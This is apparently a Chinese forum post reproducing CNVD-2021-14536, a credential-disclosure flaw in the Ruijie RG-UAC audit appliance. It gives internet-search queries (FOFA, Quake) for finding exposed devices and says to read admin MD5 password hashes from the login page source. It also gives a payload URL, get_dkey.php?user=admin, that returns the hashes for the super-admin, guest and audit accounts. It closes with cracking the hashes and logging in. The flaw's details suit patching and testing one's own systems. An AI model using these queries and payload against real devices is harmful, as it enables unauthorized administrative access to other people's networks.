锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)复现

admin 2021-3-9 1372

漏洞描述

2021年3月8日,锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证信息泄露。

漏洞影响

锐捷RG-UAC统一上网行为管理审计系统

漏洞复现

FOFA 搜索语句:title="RG-UAC登录页面"

钟馗之眼 撒旦都可以搜索


Quake空间测绘搜索语句:title:"RG-UAC登录页面" AND response:"admin"



成功访问该系统的界面,如下图所示:

然后鼠标右键(快捷键ctrl+U)打开页面源代码


快捷键(ctrl+f)搜索如下关键字:password


发现超级管理员权限的账户名和MD5进行解密:


漏洞复现

构造如下Payloads

https://xxxxx:8080/get_dkey.php?user=admin

成功访问后,可看到该系统的超级管理员权限账号、访客权限账号、审计权限账号的 账户名 和 MD5 加密的密码值,如下图所示:


然后,可对该 MD5 值进行解密:


使用账号和解密的密码登录成功


最新回复 (5)
返回
发新帖